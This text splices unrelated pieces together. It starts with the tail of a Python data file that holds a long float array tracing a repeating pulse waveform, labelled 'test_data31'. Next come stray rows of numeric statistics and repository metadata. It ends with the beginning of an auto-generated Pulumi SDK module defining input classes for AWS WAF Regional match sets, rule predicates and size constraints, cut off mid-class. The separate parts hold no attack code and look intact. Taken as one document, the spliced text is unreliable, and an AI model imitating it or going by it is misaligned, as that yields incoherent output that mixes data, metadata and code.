-0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0625, -0.0375, -0.00625, 0.01875, 0.04375, 0.075, 0.1, 0.13125, 0.15625, 0.18125, 0.2125, 0.2375, 0.2625, 0.29375, 0.31875, 0.35, 0.375, 0.4, 0.43125, 0.45625, 0.48125, 0.5125, 0.5375, 0.56875, 0.59375, 0.61875, 0.65, 0.675, 0.7, 0.73125, 0.75625, 0.7875, 0.75625, 0.73125, 0.7, 0.675, 0.65, 0.61875, 0.59375, 0.56875, 0.5375, 0.5125, 0.48125, 0.45625, 0.43125, 0.4, 0.375, 0.35, 0.31875, 0.29375, 0.2625, 0.2375, 0.2125, 0.18125, 0.15625, 0.13125, 0.1, 0.075, 0.04375, 0.01875, -0.00625, -0.0375, -0.0625, -0.0875, -0.1125, -0.1375, -0.16875, -0.19375, -0.16875, -0.1375, -0.1125, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, 
-0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, 
-0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0625, -0.0375, -0.00625, 0.01875, 0.04375, 0.075, 0.1, 0.13125, 0.15625, 0.18125, 0.2125, 0.2375, 0.2625, 0.29375, 0.31875, 0.35, 0.375, 0.4, 0.43125, 0.45625, 0.48125, 0.5125, 0.5375, 
0.56875, 0.59375, 0.61875, 0.65, 0.675, 0.7, 0.73125, 0.75625, 0.7875, 0.75625, 0.73125, 0.7, 0.675, 0.65, 0.61875, 0.59375, 0.56875, 0.5375, 0.5125, 0.48125, 0.45625, 0.43125, 0.4, 0.375, 0.35, 0.31875, 0.29375, 0.2625, 0.2375, 0.2125, 0.18125, 0.15625, 0.13125, 0.1, 0.075, 0.04375, 0.01875, -0.00625, -0.0375, -0.0625, -0.0875, -0.1125, -0.1375, -0.16875, -0.19375, -0.16875, -0.1375, -0.1125, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, 
-0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, 
-0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0625, -0.0375, -0.00625, 0.01875, 0.04375, 0.075, 0.1, 0.13125, 0.15625, 0.18125, 0.2125, 0.2375, 0.2625, 0.29375, 0.31875, 0.35, 0.375, 0.4, 0.43125, 0.45625, 0.48125, 0.5125, 0.5375, 0.56875, 0.59375, 0.61875, 0.65, 0.675, 0.7, 0.73125, 0.75625, 0.7875, 0.75625, 0.73125, 0.7, 0.675, 0.65, 0.61875, 0.59375, 0.56875, 0.5375, 0.5125, 0.48125, 0.45625, 0.43125, 0.4, 0.375, 0.35, 0.31875, 0.29375, 0.2625, 0.2375, 0.2125, 0.18125, 0.15625, 0.13125, 0.1, 0.075, 0.04375, 0.01875, -0.00625, -0.0375, -0.0625, -0.0875, -0.1125, -0.1375, -0.16875, -0.19375, -0.16875, -0.1375, -0.1125, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, 
-0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875]
filename = 'test_data31'
| 53,627
| 88,988
| 0.571472
| 40,007
| 160,881
| 2.297998
| 0.019797
| 0.471524
| 0.565763
| 0.938914
| 0.544477
| 0.544477
| 0.544477
| 0.544477
| 0.544477
| 0.544477
| 0
| 0.652146
| 0.124353
| 160,881
| 3
| 88,989
| 53,627
| 0.000461
| 0
| 0
| 0
| 0
| 0
| 0.000143
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
61aa58814c6827c6023a0af261b0c1a43e175454
| 15,337
|
py
|
Python
|
sdk/python/pulumi_aws_native/wafregional/_inputs.py
|
AaronFriel/pulumi-aws-native
|
5621690373ac44accdbd20b11bae3be1baf022d1
|
[
"Apache-2.0"
] | 29
|
2021-09-30T19:32:07.000Z
|
2022-03-22T21:06:08.000Z
|
sdk/python/pulumi_aws_native/wafregional/_inputs.py
|
AaronFriel/pulumi-aws-native
|
5621690373ac44accdbd20b11bae3be1baf022d1
|
[
"Apache-2.0"
] | 232
|
2021-09-30T19:26:26.000Z
|
2022-03-31T23:22:06.000Z
|
sdk/python/pulumi_aws_native/wafregional/_inputs.py
|
AaronFriel/pulumi-aws-native
|
5621690373ac44accdbd20b11bae3be1baf022d1
|
[
"Apache-2.0"
] | 4
|
2021-11-10T19:42:01.000Z
|
2022-02-05T10:15:49.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
# Explicit public API of this generated module: only the *Args input classes
# below are exported for `from ... import *` and documentation tooling.
__all__ = [
    'ByteMatchSetByteMatchTupleArgs',
    'ByteMatchSetFieldToMatchArgs',
    'GeoMatchSetGeoMatchConstraintArgs',
    'IPSetDescriptorArgs',
    'RateBasedRulePredicateArgs',
    'RulePredicateArgs',
    'SizeConstraintSetFieldToMatchArgs',
    'SizeConstraintSetSizeConstraintArgs',
    'SqlInjectionMatchSetFieldToMatchArgs',
    'SqlInjectionMatchSetSqlInjectionMatchTupleArgs',
    'WebACLActionArgs',
    'WebACLRuleArgs',
    'XssMatchSetFieldToMatchArgs',
    'XssMatchSetXssMatchTupleArgs',
]
@pulumi.input_type
class ByteMatchSetByteMatchTupleArgs:
    """Input arguments for one byte-match tuple of a WAFRegional ByteMatchSet.

    Mirrors the AWS WAF Regional ``ByteMatchTuple`` API shape: a required
    field-to-match, positional constraint, and text transformation, plus
    an optional target string in plain or base64 form.

    NOTE(review): the exact semantics of the string-valued fields (allowed
    constraint/transformation values) follow the AWS WAF Regional API —
    confirm against the AWS documentation; they are not visible here.
    """
    def __init__(__self__, *,
                 field_to_match: pulumi.Input['ByteMatchSetFieldToMatchArgs'],
                 positional_constraint: pulumi.Input[str],
                 text_transformation: pulumi.Input[str],
                 target_string: Optional[pulumi.Input[str]] = None,
                 target_string_base64: Optional[pulumi.Input[str]] = None):
        # The three required inputs are always stored; the two optional
        # target-string variants are stored only when supplied, so the
        # engine can distinguish "unset" from an explicit value.
        pulumi.set(__self__, "field_to_match", field_to_match)
        pulumi.set(__self__, "positional_constraint", positional_constraint)
        pulumi.set(__self__, "text_transformation", text_transformation)
        if target_string is not None:
            pulumi.set(__self__, "target_string", target_string)
        if target_string_base64 is not None:
            pulumi.set(__self__, "target_string_base64", target_string_base64)

    @property
    @pulumi.getter(name="fieldToMatch")
    def field_to_match(self) -> pulumi.Input['ByteMatchSetFieldToMatchArgs']:
        """The part of the web request to inspect (required)."""
        return pulumi.get(self, "field_to_match")

    @field_to_match.setter
    def field_to_match(self, value: pulumi.Input['ByteMatchSetFieldToMatchArgs']):
        pulumi.set(self, "field_to_match", value)

    @property
    @pulumi.getter(name="positionalConstraint")
    def positional_constraint(self) -> pulumi.Input[str]:
        """Positional-constraint string (required)."""
        return pulumi.get(self, "positional_constraint")

    @positional_constraint.setter
    def positional_constraint(self, value: pulumi.Input[str]):
        pulumi.set(self, "positional_constraint", value)

    @property
    @pulumi.getter(name="textTransformation")
    def text_transformation(self) -> pulumi.Input[str]:
        """Text-transformation string (required)."""
        return pulumi.get(self, "text_transformation")

    @text_transformation.setter
    def text_transformation(self, value: pulumi.Input[str]):
        pulumi.set(self, "text_transformation", value)

    @property
    @pulumi.getter(name="targetString")
    def target_string(self) -> Optional[pulumi.Input[str]]:
        """Optional plain-text target string; None when not set."""
        return pulumi.get(self, "target_string")

    @target_string.setter
    def target_string(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "target_string", value)

    @property
    @pulumi.getter(name="targetStringBase64")
    def target_string_base64(self) -> Optional[pulumi.Input[str]]:
        """Optional base64-encoded target string; None when not set."""
        return pulumi.get(self, "target_string_base64")

    @target_string_base64.setter
    def target_string_base64(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "target_string_base64", value)
@pulumi.input_type
class ByteMatchSetFieldToMatchArgs:
    """Field-to-match input for a WAFRegional ByteMatchSet.

    ``type`` (required) selects the request component to inspect;
    ``data`` (optional) further qualifies it — presumably a header name
    when ``type`` is a header match, per the AWS WAF FieldToMatch API;
    confirm against the AWS documentation.
    """
    def __init__(__self__, *,
                 type: pulumi.Input[str],
                 data: Optional[pulumi.Input[str]] = None):
        # Required `type` is always stored; optional `data` only when given.
        pulumi.set(__self__, "type", type)
        if data is not None:
            pulumi.set(__self__, "data", data)

    @property
    @pulumi.getter
    def type(self) -> pulumi.Input[str]:
        """Request component selector (required)."""
        return pulumi.get(self, "type")

    @type.setter
    def type(self, value: pulumi.Input[str]):
        pulumi.set(self, "type", value)

    @property
    @pulumi.getter
    def data(self) -> Optional[pulumi.Input[str]]:
        """Optional qualifier for `type`; None when not set."""
        return pulumi.get(self, "data")

    @data.setter
    def data(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "data", value)
@pulumi.input_type
class GeoMatchSetGeoMatchConstraintArgs:
    """One geo-match constraint for a WAFRegional GeoMatchSet.

    Both fields are required strings; per the AWS WAF GeoMatchConstraint
    API, ``type`` names the constraint kind and ``value`` the country code
    — confirm exact allowed values against the AWS documentation.
    """
    def __init__(__self__, *,
                 type: pulumi.Input[str],
                 value: pulumi.Input[str]):
        pulumi.set(__self__, "type", type)
        pulumi.set(__self__, "value", value)

    @property
    @pulumi.getter
    def type(self) -> pulumi.Input[str]:
        """Constraint type string (required)."""
        return pulumi.get(self, "type")

    @type.setter
    def type(self, value: pulumi.Input[str]):
        pulumi.set(self, "type", value)

    @property
    @pulumi.getter
    def value(self) -> pulumi.Input[str]:
        """Constraint value string (required)."""
        return pulumi.get(self, "value")

    @value.setter
    def value(self, value: pulumi.Input[str]):
        pulumi.set(self, "value", value)
@pulumi.input_type
class IPSetDescriptorArgs:
    """Input args for one IP set descriptor: required ``type`` and ``value``
    strings. Appears to be auto-generated Pulumi SDK code."""
    def __init__(__self__, *,
                 type: pulumi.Input[str],
                 value: pulumi.Input[str]):
        pulumi.set(__self__, "type", type)
        pulumi.set(__self__, "value", value)

    @property
    @pulumi.getter
    def type(self) -> pulumi.Input[str]:
        return pulumi.get(self, "type")

    @type.setter
    def type(self, value: pulumi.Input[str]):
        pulumi.set(self, "type", value)

    @property
    @pulumi.getter
    def value(self) -> pulumi.Input[str]:
        return pulumi.get(self, "value")

    @value.setter
    def value(self, value: pulumi.Input[str]):
        pulumi.set(self, "value", value)
@pulumi.input_type
class RateBasedRulePredicateArgs:
    """Input args for one rate-based-rule predicate: required ``data_id``
    (wire name ``dataId``), ``negated`` flag, and ``type`` string.
    Appears to be auto-generated Pulumi SDK code."""
    def __init__(__self__, *,
                 data_id: pulumi.Input[str],
                 negated: pulumi.Input[bool],
                 type: pulumi.Input[str]):
        pulumi.set(__self__, "data_id", data_id)
        pulumi.set(__self__, "negated", negated)
        pulumi.set(__self__, "type", type)

    @property
    @pulumi.getter(name="dataId")
    def data_id(self) -> pulumi.Input[str]:
        return pulumi.get(self, "data_id")

    @data_id.setter
    def data_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "data_id", value)

    @property
    @pulumi.getter
    def negated(self) -> pulumi.Input[bool]:
        return pulumi.get(self, "negated")

    @negated.setter
    def negated(self, value: pulumi.Input[bool]):
        pulumi.set(self, "negated", value)

    @property
    @pulumi.getter
    def type(self) -> pulumi.Input[str]:
        return pulumi.get(self, "type")

    @type.setter
    def type(self, value: pulumi.Input[str]):
        pulumi.set(self, "type", value)
@pulumi.input_type
class RulePredicateArgs:
    """Input args for one rule predicate: required ``data_id`` (wire name
    ``dataId``), ``negated`` flag, and ``type`` string. Structurally identical
    to RateBasedRulePredicateArgs; appears to be auto-generated Pulumi SDK
    code."""
    def __init__(__self__, *,
                 data_id: pulumi.Input[str],
                 negated: pulumi.Input[bool],
                 type: pulumi.Input[str]):
        pulumi.set(__self__, "data_id", data_id)
        pulumi.set(__self__, "negated", negated)
        pulumi.set(__self__, "type", type)

    @property
    @pulumi.getter(name="dataId")
    def data_id(self) -> pulumi.Input[str]:
        return pulumi.get(self, "data_id")

    @data_id.setter
    def data_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "data_id", value)

    @property
    @pulumi.getter
    def negated(self) -> pulumi.Input[bool]:
        return pulumi.get(self, "negated")

    @negated.setter
    def negated(self, value: pulumi.Input[bool]):
        pulumi.set(self, "negated", value)

    @property
    @pulumi.getter
    def type(self) -> pulumi.Input[str]:
        return pulumi.get(self, "type")

    @type.setter
    def type(self, value: pulumi.Input[str]):
        pulumi.set(self, "type", value)
@pulumi.input_type
class SizeConstraintSetFieldToMatchArgs:
    """Nested ``field_to_match`` input args for a Size Constraint Set:
    required ``type`` plus optional ``data`` (stored only when supplied).
    Appears to be auto-generated Pulumi SDK code."""
    def __init__(__self__, *,
                 type: pulumi.Input[str],
                 data: Optional[pulumi.Input[str]] = None):
        pulumi.set(__self__, "type", type)
        if data is not None:
            pulumi.set(__self__, "data", data)

    @property
    @pulumi.getter
    def type(self) -> pulumi.Input[str]:
        return pulumi.get(self, "type")

    @type.setter
    def type(self, value: pulumi.Input[str]):
        pulumi.set(self, "type", value)

    @property
    @pulumi.getter
    def data(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "data")

    @data.setter
    def data(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "data", value)
@pulumi.input_type
class SizeConstraintSetSizeConstraintArgs:
    """Input args for one size constraint: required ``comparison_operator``
    (wire ``comparisonOperator``), ``field_to_match`` (a nested
    SizeConstraintSetFieldToMatchArgs), integer ``size``, and
    ``text_transformation`` (wire ``textTransformation``).
    Appears to be auto-generated Pulumi SDK code."""
    def __init__(__self__, *,
                 comparison_operator: pulumi.Input[str],
                 field_to_match: pulumi.Input['SizeConstraintSetFieldToMatchArgs'],
                 size: pulumi.Input[int],
                 text_transformation: pulumi.Input[str]):
        pulumi.set(__self__, "comparison_operator", comparison_operator)
        pulumi.set(__self__, "field_to_match", field_to_match)
        pulumi.set(__self__, "size", size)
        pulumi.set(__self__, "text_transformation", text_transformation)

    @property
    @pulumi.getter(name="comparisonOperator")
    def comparison_operator(self) -> pulumi.Input[str]:
        return pulumi.get(self, "comparison_operator")

    @comparison_operator.setter
    def comparison_operator(self, value: pulumi.Input[str]):
        pulumi.set(self, "comparison_operator", value)

    @property
    @pulumi.getter(name="fieldToMatch")
    def field_to_match(self) -> pulumi.Input['SizeConstraintSetFieldToMatchArgs']:
        return pulumi.get(self, "field_to_match")

    @field_to_match.setter
    def field_to_match(self, value: pulumi.Input['SizeConstraintSetFieldToMatchArgs']):
        pulumi.set(self, "field_to_match", value)

    @property
    @pulumi.getter
    def size(self) -> pulumi.Input[int]:
        return pulumi.get(self, "size")

    @size.setter
    def size(self, value: pulumi.Input[int]):
        pulumi.set(self, "size", value)

    @property
    @pulumi.getter(name="textTransformation")
    def text_transformation(self) -> pulumi.Input[str]:
        return pulumi.get(self, "text_transformation")

    @text_transformation.setter
